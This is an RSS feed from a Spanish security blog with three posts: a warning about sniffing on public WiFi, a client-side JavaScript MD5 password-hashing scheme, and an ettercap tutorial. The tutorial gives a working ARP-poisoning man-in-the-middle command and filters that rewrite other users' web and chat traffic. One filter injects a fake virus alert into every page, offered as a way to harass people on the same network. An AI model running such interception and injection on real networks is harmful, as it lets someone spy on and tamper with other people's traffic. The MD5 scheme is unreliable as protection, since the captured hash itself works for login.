<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>El rincón de Zerial &#187; sniffer</title>
	<atom:link href="http://blog.zerial.org/tag/sniffer/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.zerial.org</link>
	<description>Informática, GNU/Linux, Seguridad, Hacking, Programación, Ocio</description>
	<lastBuildDate>Tue, 20 Jul 2010 18:13:34 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>Inseguridad de redes inalámbricas en cafeterias, pubs, hoteles, etc</title>
		<link>http://blog.zerial.org/seguridad/inseguridad-de-redes-inalambricas-en-cafeterias-pubs-hoteles-etc/</link>
		<comments>http://blog.zerial.org/seguridad/inseguridad-de-redes-inalambricas-en-cafeterias-pubs-hoteles-etc/#comments</comments>
		<pubDate>Sat, 21 Nov 2009 16:02:11 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Interes general]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[ettercap]]></category>
		<category><![CDATA[inseguridad]]></category>
		<category><![CDATA[mitm]]></category>
		<category><![CDATA[sniffer]]></category>
		<category><![CDATA[wifi]]></category>
		<category><![CDATA[wireless]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=1113</guid>
		<description><![CDATA[Me gustaría escribir un poco sobre el tema de la seguridad en las redes inalámbricas que uno se encuentra cuando va a alguna cafetería, hotel, pub, restorante, etc. Es muy común que sólo las personas que consuman algún producto en el local tengan acceso a wifi, para esto la súper medida de protección que se [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-1140" style="margin: 4px;" title="hackwifi" src="http://blog.zerial.org/wp-content/uploads/2009/11/hackwifi.png" alt="hackwifi" width="256" height="147" />Me gustaría escribir un poco sobre el tema de la seguridad en las redes inalámbricas que uno se encuentra cuando va a alguna cafetería, hotel, pub, restorante, etc. Es muy común que sólo las personas que consuman algún producto en el local tengan acceso a wifi, para esto la <strong>súper medida de protección</strong> que se toma es entregar en un papelito la clave de la WiFi y que, aunque no lo crean, generalmente es una clave WEP y más todavía, muchas veces es una clave por defecto entregada por el proveedor. Este tipo de accesos muy pocas veces (por no decir nunca) cuentan con un <em>portal cautivo</em> o <em>captive portal</em>, algún tipo de protección o filtro en un firewall, proxy, etc y para rematar, este tipo de señales son emitidas con los típicos router de marca dlink (sí, esos baratos) o bien uno de marca X que cueste poco dinero.<br />
La mayoría de la gente que acude a éste tipo de lugares, no son expertos informáticos o en seguridad ni tienen mucho conocimiento en temas de protección de información, redes inalámbricas, etc. Generalmente son personas &#8220;normales&#8221; que se compran un portatil (pc, mac o lo que sea) y se conectan a una red donde sea que la pillen. Realizan sus transferencias (desde su banco online), revisan su correo, inician sesión en los servicios que tengan cuenta, chatean, etc sin ni si quiera preocuparse (yo diría que ni si quiera se imaginan) de que alguien puede estar leyendo y/o observando todo lo que está haciendo, filtrando y <strong>guardando</strong> información.</p>
<p><strong>¿Y cómo termina todo esto?</strong><br />
Por ejemplo, con <a href="http://bitelia.com/2009/10/se-filtran-miles-de-contrasenas-de-hotmail" target="_blank">ésto</a>.</p>
<p><span id="more-1113"></span>Como dice mi querido amigo Clark en <a href="http://blog.zerial.org/seguridad/atacando-desde-el-corazon/#comment-72903" target="_blank">un comentario</a> de <a href="http://blog.zerial.org/seguridad/atacando-desde-el-corazon/" target="_blank">un post anterior</a>:</p>
<blockquote><p>@Zerial, con respecto a este tema te encuentro toda la razon, sin tener mucho conociento en el tema hice algunas pruebas por una wifi con cifrado wep de una universidad X y chan! claro despues de un rato de acostumbramiento comence a adquirir user y pass de los funcionarios, pc’s, servidores y mas informacion, claro ahora estoy con la duda de dar a conocer sus problemas?, vuelvo a repetir no tengo muchos conocimientos en el tema pero hacerlo fue gratificante como dice @andres. ademas puedo decir que me encanto y me pico el bichito de la curiosidad lo que me lleva a documentarme mejor en el tema! y ahora se que alguien siempre esta escuchando del otro lado :s.</p></blockquote>
<p><img class="size-medium wp-image-1144 alignleft" title="altavoz_espia" src="http://blog.zerial.org/wp-content/uploads/2009/11/altavoz_espia-300x236.jpg" alt="altavoz_espia" width="300" height="236" />No hay que ser un experto, no hay que ser un <span style="text-decoration: line-through;">jajaja</span>hacker ni un experto en seguridad informática, simplemente hay que tener las herramientas para hacerlo y ni si quiera saber ocupar las herramientas al 100%, actualmente con la información que hay en el manual de <em>ettercap</em> es posible lograr muchas cosas. Al igual que en una conversación telefónica, celular o lo que sea, siempre puede haber un tercero que esté filtrando la información, siempre puede existir un &#8220;hombre en el medio&#8221; (MiTM).<br />
No se trata de un tema de paranoia ni nada por el estilo, pero creo que debemos tomar conciencia y tener conocimiento de donde nos estamos conectando, a traves de quien estamos pasando, etc.</p>
<p>En mi caso, cuando me conecto a unas de estas redes no dejo de hacer las cosas que hago siempre, pero me aseguro de que nadie esté &#8220;escuchando&#8221; lo que estoy haciendo. Si me aparece un certificado falso, obviamente no lo voy a aceptar (cosa que el común de la gente si lo hace), no voy a hacer transferencias ni ingresar a la cuenta de mi banco, y si trafico información importante me aseguro de que la información viaje por un canal seguro.</p>
<p>Tal véz deba existir <em>algo</em> que regule éste tipo de cosas.</p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Finseguridad-de-redes-inalambricas-en-cafeterias-pubs-hoteles-etc%2F&amp;linkname=Inseguridad%20de%20redes%20inal%C3%A1mbricas%20en%20cafeterias%2C%20pubs%2C%20hoteles%2C%20etc" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Finseguridad-de-redes-inalambricas-en-cafeterias-pubs-hoteles-etc%2F&amp;linkname=Inseguridad%20de%20redes%20inal%C3%A1mbricas%20en%20cafeterias%2C%20pubs%2C%20hoteles%2C%20etc" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Finseguridad-de-redes-inalambricas-en-cafeterias-pubs-hoteles-etc%2F&amp;linkname=Inseguridad%20de%20redes%20inal%C3%A1mbricas%20en%20cafeterias%2C%20pubs%2C%20hoteles%2C%20etc" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Finseguridad-de-redes-inalambricas-en-cafeterias-pubs-hoteles-etc%2F&amp;linkname=Inseguridad%20de%20redes%20inal%C3%A1mbricas%20en%20cafeterias%2C%20pubs%2C%20hoteles%2C%20etc" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Finseguridad-de-redes-inalambricas-en-cafeterias-pubs-hoteles-etc%2F&amp;linkname=Inseguridad%20de%20redes%20inal%C3%A1mbricas%20en%20cafeterias%2C%20pubs%2C%20hoteles%2C%20etc" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Finseguridad-de-redes-inalambricas-en-cafeterias-pubs-hoteles-etc%2F&amp;linkname=Inseguridad%20de%20redes%20inal%C3%A1mbricas%20en%20cafeterias%2C%20pubs%2C%20hoteles%2C%20etc" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Finseguridad-de-redes-inalambricas-en-cafeterias-pubs-hoteles-etc%2F&amp;linkname=Inseguridad%20de%20redes%20inal%C3%A1mbricas%20en%20cafeterias%2C%20pubs%2C%20hoteles%2C%20etc" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Finseguridad-de-redes-inalambricas-en-cafeterias-pubs-hoteles-etc%2F&amp;linkname=Inseguridad%20de%20redes%20inal%C3%A1mbricas%20en%20cafeterias%2C%20pubs%2C%20hoteles%2C%20etc">Compartir/Guardar</a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/inseguridad-de-redes-inalambricas-en-cafeterias-pubs-hoteles-etc/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Cómo agregar una capa más de seguridad a un login</title>
		<link>http://blog.zerial.org/seguridad/como-agregar-capa-seguridad-login/</link>
		<comments>http://blog.zerial.org/seguridad/como-agregar-capa-seguridad-login/#comments</comments>
		<pubDate>Wed, 15 Jul 2009 04:14:29 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[cifrado]]></category>
		<category><![CDATA[formularios]]></category>
		<category><![CDATA[javascript]]></category>
		<category><![CDATA[md5]]></category>
		<category><![CDATA[sniffer]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=551</guid>
		<description><![CDATA[Un sistema de inicio de sesión tradicional funciona simplemente enviando, en texto plano, los datos de usuario y password al sistema en php o el lenguaje que sea, el sistema lo recibe, lo encripta y lo compara con la información de la base de datos para saber si es correcto o no. Lo que no [...]]]></description>
			<content:encoded><![CDATA[<p>Un sistema de inicio de sesión tradicional funciona simplemente enviando, en texto plano, los datos de usuario y password al sistema en php o el lenguaje que sea, el sistema lo recibe, lo encripta y lo compara con la información de la base de datos para saber si es correcto o no. Lo que no está mal, pero deja abierta la posibilida de que alguien este <em>sniffeando</em> la red y capture los datos en bruto (raw) o texto plano.<br />
Como podemos ver en el siguiente esquema:</p>
<p><img class="aligncenter size-full wp-image-554" title="secure-js1" src="http://blog.zerial.org/wp-content/uploads/2009/07/secure-js1.png" alt="secure-js1" width="347" height="230" /></p>
<p>Una forma que se me ocurrió para que los datos del formulario, especialmente la password, no viajarán en texto plano, fue encriptarla mediante javascript al momento de hacer el submit. De esta forma, cuando el atacante logre capturar los datos lo que verá es una cadena en md5, como aparece en el siguiente gráfico:</p>
<p><img class="aligncenter size-full wp-image-555" title="secure-js2" src="http://blog.zerial.org/wp-content/uploads/2009/07/secure-js2.png" alt="secure-js2" width="347" height="230" /></p>
<p><span id="more-551"></span></p>
<p><strong>Los pros y contras</strong><br />
Este método nos entregará una capa de seguridad dependiente del navegador, obviamente, para que funcione vamos a necesitar un navegador con soporte de javascript y tambien un sistema de login adaptado para recibir un string ya cifrado en md5.<br />
Como puntos a favor, podemos decir que para el atacante (sniffer) será más complicado obtener la clave en texto plano. Si esta persona usa el mismo sistema para autentificarse usando el hash md5 <em>snifeado</em>, el javascript volverá a encriptarlo y cuando lo envie, no va a coincidir con el hash que está en la base de datos.<br />
Como punto en contra, el usuario de todas formas podrá logearse cuando obtenga el hash, con algun script o un login paralelo que no haga la encriptación de la clave pero por otro lado, el atacante <strong>nunca podrá saber la password que usa la persona</strong>, sólo conocerá su hash el cual no le servirá para ingresar a otros servicios, en el caso que use la misma password para mas de un sistema.<br />
Como punto a favor, este metodo puede dificultarle la tarea a atacantes <em>newbies</em>, que seguramente intentarán logearse una y otra véz con el hash que capturaron preguntandose <em>¿WTF, que le pasa a esta mierda que no funciona?</em>.</p>
<p><strong>Video demostrativo</strong></p>
<p><span class="youtube">
<object width="480" height="360">
<param name="movie" value="http://www.youtube.com/v/P4lyA77DtZY&amp;rel=1&amp;color1=d6d6d6&amp;color2=f0f0f0&amp;border=0&amp;fs=1&amp;hl=en&amp;autoplay=0&amp;showinfo=0&amp;iv_load_policy=3&amp;showsearch=0&amp;hd=1" />
<param name="allowFullScreen" value="true" />
<embed wmode="transparent" src="http://www.youtube.com/v/P4lyA77DtZY&amp;rel=1&amp;color1=d6d6d6&amp;color2=f0f0f0&amp;border=0&amp;fs=1&amp;hl=en&amp;autoplay=0&amp;showinfo=0&amp;iv_load_policy=3&amp;showsearch=0&amp;hd=1" type="application/x-shockwave-flash" allowfullscreen="true" width="480" height="360"></embed>
<param name="wmode" value="transparent" />
</object>
</span><p><a href="http://www.youtube.com/watch?v=P4lyA77DtZY&fmt=18">www.youtube.com/watch?v=P4lyA77DtZY</a></p></p>
<p>Links a Youtube: <a href="http://www.youtube.com/watch?v=P4lyA77DtZY" target="_blank">http://www.youtube.com/watch?v=P4lyA77DtZY</a><br />
<span style="text-decoration: line-through;">Descargar (ogv, 47Mb)</span></p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcomo-agregar-capa-seguridad-login%2F&amp;linkname=C%C3%B3mo%20agregar%20una%20capa%20m%C3%A1s%20de%20seguridad%20a%20un%20login" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcomo-agregar-capa-seguridad-login%2F&amp;linkname=C%C3%B3mo%20agregar%20una%20capa%20m%C3%A1s%20de%20seguridad%20a%20un%20login" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcomo-agregar-capa-seguridad-login%2F&amp;linkname=C%C3%B3mo%20agregar%20una%20capa%20m%C3%A1s%20de%20seguridad%20a%20un%20login" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcomo-agregar-capa-seguridad-login%2F&amp;linkname=C%C3%B3mo%20agregar%20una%20capa%20m%C3%A1s%20de%20seguridad%20a%20un%20login" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcomo-agregar-capa-seguridad-login%2F&amp;linkname=C%C3%B3mo%20agregar%20una%20capa%20m%C3%A1s%20de%20seguridad%20a%20un%20login" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcomo-agregar-capa-seguridad-login%2F&amp;linkname=C%C3%B3mo%20agregar%20una%20capa%20m%C3%A1s%20de%20seguridad%20a%20un%20login" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcomo-agregar-capa-seguridad-login%2F&amp;linkname=C%C3%B3mo%20agregar%20una%20capa%20m%C3%A1s%20de%20seguridad%20a%20un%20login" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcomo-agregar-capa-seguridad-login%2F&amp;linkname=C%C3%B3mo%20agregar%20una%20capa%20m%C3%A1s%20de%20seguridad%20a%20un%20login">Compartir/Guardar</a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/como-agregar-capa-seguridad-login/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>Filtros simples en ettercap</title>
		<link>http://blog.zerial.org/seguridad/filtros-simples-en-ettercap/</link>
		<comments>http://blog.zerial.org/seguridad/filtros-simples-en-ettercap/#comments</comments>
		<pubDate>Sun, 07 Dec 2008 21:52:17 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Documentacion]]></category>
		<category><![CDATA[GNU/Linux]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[ettercap]]></category>
		<category><![CDATA[filtros]]></category>
		<category><![CDATA[man in the middle]]></category>
		<category><![CDATA[mitm]]></category>
		<category><![CDATA[sniffer]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=187</guid>
		<description><![CDATA[Les motraré cómo crear filtros simples para usar con ettercap, para que podamos modificar parte del tráfico como tags html, conversaciones de chat, etc. Para esto necesitamos obviamente instalar el suit ettercap-ng, lo podemos descargar desde Sitio oficial ettercap Haremos las pruebas con el sitio http://www.google.cl, modificaremos el título, el contenido, la imágen, etc. Para [...]]]></description>
			<content:encoded><![CDATA[<p>Les motraré cómo crear filtros <em>simples</em> para usar con ettercap, para que podamos modificar parte del tráfico como <em>tags</em> html, conversaciones de chat, etc.<br />
Para esto necesitamos obviamente instalar el <em>suit</em> ettercap-ng, lo podemos descargar desde <a href="http://ettercap.sf.net" target="_ettercap">Sitio oficial ettercap</a></p>
<p>Haremos las pruebas con el sitio <a href="http://www.google.cl" target="_google">http://www.google.cl</a>, modificaremos el título, el contenido, la imágen, etc.<br />
<a href="http://blog.zerial.org/wp-content/uploads/2008/12/g1.png"><img class="aligncenter size-full wp-image-190" title="g1-thumb" src="http://blog.zerial.org/wp-content/uploads/2008/12/g1-thumb.png" alt="" width="500" height="367" /></a><br />
<span id="more-187"></span></p>
<p>Para este ejemplo vamos a crear un filtro llamado <em>google.filter</em>. Lo creamos usando nuestro editor de texto preferido, en mi caso <a href="http://www.vim.org" target="_vim">vim</a>:</p>
<blockquote><p>$ vim google.filter</p></blockquote>
<p>En él escribimos:</p>
<div class="dean_ch" style="white-space: wrap;">
<ol>
<li class="li1">
<div class="de1">replace<span class="br0">&#40;</span><span class="st0">&quot;&lt;/title&gt;&quot;</span>, <span class="st0">&quot;&lt;/titleee&gt;&quot;</span><span class="br0">&#41;</span>;</div>
</li>
<li class="li1">
<div class="de1">replace<span class="br0">&#40;</span><span class="st0">&quot;&lt;title&gt;&quot;</span>, <span class="st0">&quot;&lt;title&gt;Gooooooogle&lt;/title&gt;&lt;titleee&gt;&quot;</span><span class="br0">&#41;</span>;</div>
</li>
</ol>
</div>
<p>Guardamos y <em>compilamos </em>el filtro usando <strong>etterfilter</strong>:</p>
<blockquote><p>$ etterfilter google.filter</p></blockquote>
<p>Nos creará un fichero llamado <em>filter.ef</em>, que es el que usaremos.<br />
Ejecutamos ettercap y aplicamos el filtro:</p>
<blockquote><p># ettercap -Tq -M arp:remote -i <strong>interface</strong> -F <em>filter.ef </em>// //</p></blockquote>
<p>Ahora cualquier pc de la red, cuando ingrese a Google, verá el título modificado.</p>
<p>Podemos modificar el tag o información que queramos, no solo html, sino todo el tráfico de la red.<br />
Por ejemplo, si queremos modificar la o las imágen de un sitio:</p>
<div class="dean_ch" style="white-space: wrap;">
<ol>
<li class="li1">
<div class="de1">replace<span class="br0">&#40;</span><span class="st0">&quot;<span class="es0">\<</span>img&quot;</span>, <span class="st0">&quot;<span class="es0">\<</span>img src=http://direccion..de/la/imagen/que/quieres_insertar.jpg<span class="es0">\></span> <span class="es0">\<</span>aaa&quot;</span><span class="br0">&#41;</span>;</div>
</li>
</ol>
</div>
<p><strong>nota: </strong>Con todo esto, lo que estámos haciendo es modificar cualquier información que este viajando por la red, no solo las páginas web, si hacen la prueba y escriben <em>&lt;img </em>por msn, verán que ettercap automáticamente lo reemplazará por lo que especificamos en el filtro.<br />
Tambien podemos especificar que sólo queremos jugar con el protocolo http y la web agregando la siguiente condición a nuestro filtro:</p>
<div class="dean_ch" style="white-space: wrap;">
<ol>
<li class="li1">
<div class="de1"><span class="kw1">if</span> <span class="br0">&#40;</span>ip.proto == TCP &amp;amp;&amp;amp; tcp.src == <span class="nu0">80</span><span class="br0">&#41;</span> <span class="br0">&#123;</span></div>
</li>
<li class="li1">
<div class="de1"><span class="br0">&#91;</span>&#8230;<span class="br0">&#93;</span> acá las acciones</div>
</li>
<li class="li1">
<div class="de1"><span class="br0">&#125;</span></div>
</li>
</ol>
</div>
<p>Aprendiendo a aplicar e implementar estos filtros podemos hacer una infinidades de cosas divertidas, ya sea para fastidiar a algun amigo o simplemente para joder a los demás. Es cosa de usar la imaginación, por ejemplo, el siguiente filtro:</p>
<div class="dean_ch" style="white-space: wrap;">
<ol>
<li class="li1">
<div class="de1">replace<span class="br0">&#40;</span><span class="st0">&quot;<span class="es0">\<</span>body&quot;</span>, <span class="st0">&quot;<span class="es0">\<</span>body onload=<span class="es0">\&quot;</span>alert(&#8216;Usted tiene un virus.&#8217;);confirm(&#8216;Chupamela?&#8217;);<span class="es0">\&quot;</span><span class="es0">\></span>&quot;</span><span class="br0">&#41;</span>;</div>
</li>
</ol>
</div>
<p>Hará que cuando alguien ingrese a cualquier sitio aparezca una alerta diciendo que tiene un virus y luego, para joderle un poco más, una ventana de confirmación.</p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Ffiltros-simples-en-ettercap%2F&amp;linkname=Filtros%20simples%20en%20ettercap" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Ffiltros-simples-en-ettercap%2F&amp;linkname=Filtros%20simples%20en%20ettercap" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Ffiltros-simples-en-ettercap%2F&amp;linkname=Filtros%20simples%20en%20ettercap" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Ffiltros-simples-en-ettercap%2F&amp;linkname=Filtros%20simples%20en%20ettercap" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Ffiltros-simples-en-ettercap%2F&amp;linkname=Filtros%20simples%20en%20ettercap" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Ffiltros-simples-en-ettercap%2F&amp;linkname=Filtros%20simples%20en%20ettercap" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Ffiltros-simples-en-ettercap%2F&amp;linkname=Filtros%20simples%20en%20ettercap" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Ffiltros-simples-en-ettercap%2F&amp;linkname=Filtros%20simples%20en%20ettercap">Compartir/Guardar</a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/filtros-simples-en-ettercap/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
	</channel>
</rss>
